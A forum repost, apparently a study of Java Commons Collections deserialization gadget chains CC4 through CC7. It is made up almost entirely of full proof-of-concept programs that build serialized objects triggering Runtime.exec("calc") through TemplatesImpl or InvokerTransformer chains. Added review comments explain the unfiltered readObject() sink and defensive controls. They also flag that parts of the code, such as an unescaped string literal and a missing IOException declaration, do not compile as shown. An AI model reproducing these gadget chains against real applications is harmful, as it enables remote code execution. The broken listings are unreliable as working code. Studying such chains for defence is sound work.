本帖最后由 margin 于 2022-3-14 22:34 编辑
原文链接:Java安全之Commons Collections4-7分析 (qq.com)
CC4分析
- import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
- import javassist.*;
- import org.apache.commons.collections4.Transformer;
- import org.apache.commons.collections4.comparators.TransformingComparator;
- import org.apache.commons.collections4.functors.ChainedTransformer;
- import org.apache.commons.collections4.functors.ConstantTransformer;
- import org.apache.commons.collections4.functors.InstantiateTransformer;
- import javax.xml.transform.Templates;
- import java.io.*;
- import java.lang.reflect.Field;
- import java.lang.reflect.InvocationTargetException;
- import java.util.PriorityQueue;
// Proof-of-concept for the "CC4" deserialization gadget chain. main() builds a
// PriorityQueue whose comparator is a TransformingComparator, serializes it to
// test.out and reads it back in the same process; the final readObject() is the
// step being studied.
// Defender's view: every object in the graph is a JDK or Commons Collections 4
// class, so an application is exposed when it calls readObject() on bytes it does
// not control while these classes are on its classpath. The control to look for is
// an allow-list on the stream (java.io.ObjectInputFilter) or no native Java
// deserialization of untrusted input at all.
- public class cc4 {
- public static void main(String[] args) throws IOException, CannotCompileException, ClassNotFoundException, NoSuchFieldException, IllegalAccessException, NotFoundException, NoSuchMethodException, InvocationTargetException, InstantiationException {
- // Create the malicious class from generated bytecode (javassist)
- String AbstractTranslet="com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet";
- ClassPool classPool=ClassPool.getDefault();
- classPool.appendClassPath(AbstractTranslet);
- CtClass payload=classPool.makeClass("cc4Demo");
- payload.setSuperclass(classPool.get(AbstractTranslet));
// The generated class carries its behaviour in the static initializer, so it runs
// when the class is initialized rather than when a method is called.
// NOTE(review): as rendered, the inner quotes around calc are not escaped, so this
// string literal is not valid Java; this looks like an extraction artifact.
- payload.makeClassInitializer().setBody("java.lang.Runtime.getRuntime().exec("calc");");
- byte[] bytes = payload.toBytecode();
- // Instantiate TemplatesImpl via reflection
- String TemplatesImpl="com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl";
- Object templates = Class.forName(TemplatesImpl).getDeclaredConstructor(new Class[]{}).newInstance();
- // Set the _bytecodes field: store the generated class bytes in _bytecodes
- Field field=templates.getClass().getDeclaredField("_bytecodes");
- field.setAccessible(true);
- field.set(templates,new byte[][]{bytes});
- // Set the _name field
- Field name=templates.getClass().getDeclaredField("_name");
- name.setAccessible(true);
- name.set(templates,"test");
- // Build the transformers
// Step 1 yields TrAXFilter.class; step 2 instantiates it, passing the prepared
// templates object as the Templates constructor argument. What that constructor
// does with _bytecodes is library behaviour not shown in this listing.
- Transformer[] trans = new Transformer[]{
- new ConstantTransformer(TrAXFilter.class),
- new InstantiateTransformer(
- new Class[]{Templates.class},
- new Object[]{templates})
- };
- // Build the ChainedTransformer
- ChainedTransformer chian = new ChainedTransformer(trans);
- TransformingComparator transCom = new TransformingComparator(chian);
- // Build the PriorityQueue
// Two placeholder elements are added first and the comparator is installed by
// reflection afterwards, presumably so the transformer chain is not evaluated
// while the queue is being built.
- PriorityQueue queue = new PriorityQueue(2);
- queue.add(1);
- queue.add(1);
- Field com = PriorityQueue.class.getDeclaredField("comparator");
- com.setAccessible(true);
- com.set(queue,transCom);
// Round trip through a local file: write the queue, then read it back.
- ObjectOutputStream outputStream = new ObjectOutputStream(new FileOutputStream("test.out"));
- outputStream.writeObject(queue);
- outputStream.close();
// No ObjectInputFilter is set on this stream, so any Serializable class on the
// classpath may be instantiated here; this call is the sink the chain depends on.
// The input stream is also never closed.
- ObjectInputStream inputStream=new ObjectInputStream(new FileInputStream("test.out"));
- inputStream.readObject();
- }
- }
 
 
 
 
 
 
 
CC5分析
- import org.apache.commons.collections.Transformer;
- import org.apache.commons.collections.functors.ChainedTransformer;
- import org.apache.commons.collections.functors.ConstantTransformer;
- import org.apache.commons.collections.functors.InvokerTransformer;
- import org.apache.commons.collections.map.LazyMap;
- import org.apache.commons.collections4.keyvalue.TiedMapEntry;
- import javax.management.BadAttributeValueExpException;
- import java.io.FileInputStream;
- import java.io.FileOutputStream;
- import java.io.ObjectInputStream;
- import java.io.ObjectOutputStream;
- import java.lang.reflect.Field;
- import java.util.HashMap;
// Proof-of-concept for the "CC5" deserialization gadget chain. main() wraps a
// LazyMap-backed TiedMapEntry inside a BadAttributeValueExpException, serializes
// it to test.out and reads it back in the same process.
// Defender's view: the sink is readObject() on untrusted bytes while Commons
// Collections is on the classpath. Check for an ObjectInputFilter allow-list on
// the stream and for a Commons Collections release that refuses to deserialize
// InvokerTransformer by default.
// NOTE(review): the stream constructors and writeObject/readObject throw
// IOException, which this throws clause does not declare, so the listing does not
// compile as shown.
- public class cc5 {
- public static void main(String[] args) throws ClassNotFoundException, NoSuchFieldException, IllegalAccessException {
// Transformer chain: start from Runtime.class, reflectively look up and invoke
// getRuntime(), then call exec("calc") on the result.
- ChainedTransformer chain = new ChainedTransformer(new Transformer[] {
- new ConstantTransformer(Runtime.class),
- new InvokerTransformer("getMethod", new Class[] {
- String.class, Class[].class }, new Object[] {
- "getRuntime", new Class[0] }),
- new InvokerTransformer("invoke", new Class[] {
- Object.class, Object[].class }, new Object[] {
- null, new Object[0] }),
- new InvokerTransformer("exec",
- new Class[] { String.class }, new Object[]{"calc"})});
// LazyMap.decorate ties the chain to an empty map; the TiedMapEntry pairs that
// map with key 123, which the map does not contain.
- HashMap innermap = new HashMap();
- LazyMap map = (LazyMap)LazyMap.decorate(innermap,chain);
- TiedMapEntry tiedmap = new TiedMapEntry(map,123);
// The exception is constructed with a harmless value and its private "val" field
// is overwritten by reflection, presumably so the entry is not evaluated when the
// exception object is created.
- BadAttributeValueExpException poc = new BadAttributeValueExpException(1);
- Field val = Class.forName("javax.management.BadAttributeValueExpException").getDeclaredField("val");
- val.setAccessible(true);
- val.set(poc,tiedmap);
// Round trip through a local file: write the exception object, then read it back.
- ObjectOutputStream outputStream = new ObjectOutputStream(new FileOutputStream("test.out"));
- outputStream.writeObject(poc);
- outputStream.close();
// Unfiltered readObject(): the deserialization sink. The input stream is never closed.
- ObjectInputStream inputStream = new ObjectInputStream(new FileInputStream("test.out"));
- inputStream.readObject();
- }
- }
 
 
 
 
 
 
CC6分析
- import org.apache.commons.collections.*;
- import org.apache.commons.collections.functors.ChainedTransformer;
- import org.apache.commons.collections.functors.ConstantTransformer;
- import org.apache.commons.collections.functors.InvokerTransformer;
- import org.apache.commons.collections.keyvalue.TiedMapEntry;
- import org.apache.commons.collections.map.LazyMap;
- import java.io.*;
- import java.util.HashMap;
- import java.util.HashSet;
- import java.util.Map;
// Proof-of-concept for the "CC6" deserialization gadget chain. main() places a
// LazyMap-backed TiedMapEntry in a HashSet, serializes the set to test.out and
// reads it back in the same process.
// Defender's view: the outer object is an ordinary java.util.HashSet, so blocking
// a single "dangerous" outer type does not help. The effective controls are an
// ObjectInputFilter allow-list on the stream and a Commons Collections release
// that refuses to deserialize InvokerTransformer by default.
- public class cc6 {
- public static void main(String[] args) throws NoSuchFieldException, IllegalAccessException, IOException, ClassNotFoundException {
// Transformer chain: start from Runtime.class, reflectively look up and invoke
// getRuntime(), then call exec("calc") on the result.
- Transformer[] transformers=new Transformer[]{
- new ConstantTransformer(Runtime.class),
- new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",new Class[]{}}),
- new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null,new Object[]{}}),
- new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"})
- };
- ChainedTransformer Testtransformer = new ChainedTransformer(transformers);
- // Create a HashMap
- Map map=new HashMap();
- Map lazyMap=LazyMap.decorate(map,Testtransformer);
- TiedMapEntry tiedMapEntry=new TiedMapEntry(lazyMap,"test1");
- HashSet hashSet=new HashSet(1);
// Order matters here. Presumably hashSet.add() hashes the entry, which evaluates
// it once and leaves "test1" cached in the map; the remove() that follows clears
// that key so the lookup misses again after deserialization. TODO confirm against
// the library source.
- hashSet.add(tiedMapEntry);
- lazyMap.remove("test1");
// Round trip through a local file: write the set, then read it back.
- ObjectOutputStream objectOutputStream = new ObjectOutputStream(new FileOutputStream("test.out"));
- objectOutputStream.writeObject(hashSet);
- objectOutputStream.close();
// Unfiltered readObject(): the deserialization sink. The input stream is never closed.
- ObjectInputStream objectInputStream = new ObjectInputStream(new FileInputStream("test.out"));
- objectInputStream.readObject();
- }
- }
 
 
 
 
 
 
CC7分析
- import org.apache.commons.collections.Transformer;
- import org.apache.commons.collections.functors.ChainedTransformer;
- import org.apache.commons.collections.functors.ConstantTransformer;
- import org.apache.commons.collections.functors.InvokerTransformer;
- import org.apache.commons.collections.map.LazyMap;
- import java.io.*;
- import java.util.HashMap;
- import java.util.Hashtable;
- import java.util.Map;
// Proof-of-concept for the "CC7" deserialization gadget chain. main() stores two
// LazyMaps as keys of a Hashtable, serializes the table to test.out and reads it
// back in the same process.
// Defender's view: the outer object is an ordinary java.util.Hashtable. The
// effective controls are an ObjectInputFilter allow-list on the stream and a
// Commons Collections release that refuses to deserialize InvokerTransformer by
// default.
- public class cc7 {
- public static void main(String[] args) throws NoSuchFieldException, IllegalAccessException, IOException, ClassNotFoundException {
// Transformer chain: start from Runtime.class, reflectively look up and invoke
// getRuntime(), then call exec("calc") on the result.
- Transformer[] transformers=new Transformer[]{
- new ConstantTransformer(Runtime.class),
- new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",new Class[]{}}),
- new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null,new Object[]{}}),
- new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"})
- };
- ChainedTransformer Testtransformer = new ChainedTransformer(transformers);
// Two LazyMaps share the same chain. Their single keys, "yy" and "zZ", have the
// same String.hashCode() (3872), so the two maps hash alike as Hashtable keys.
- Map innerMap1 = new HashMap();
- Map innerMap2 = new HashMap();
- Map lazyMap1 = LazyMap.decorate(innerMap1, Testtransformer);
- lazyMap1.put("yy", 1);
- Map lazyMap2 = LazyMap.decorate(innerMap2, Testtransformer);
- lazyMap2.put("zZ", 1);
- Hashtable hashtable = new Hashtable();
- hashtable.put(lazyMap1, 1);
- hashtable.put(lazyMap2, 2);
// Presumably the second put() compared the two maps and, as a side effect, left a
// "yy" entry in lazyMap2; removing it restores the state in which that lookup
// misses again after deserialization. TODO confirm against the library source.
- lazyMap2.remove("yy");
// Round trip through a local file: write the table, then read it back.
- ObjectOutputStream objectOutputStream = new ObjectOutputStream(new FileOutputStream("test.out"));
- objectOutputStream.writeObject(hashtable);
- objectOutputStream.close();
// Unfiltered readObject(): the deserialization sink. The input stream is never closed.
- ObjectInputStream objectInputStream = new ObjectInputStream(new FileInputStream("test.out"));
- objectInputStream.readObject();
- }
- }
 
 
 
 
 
 
 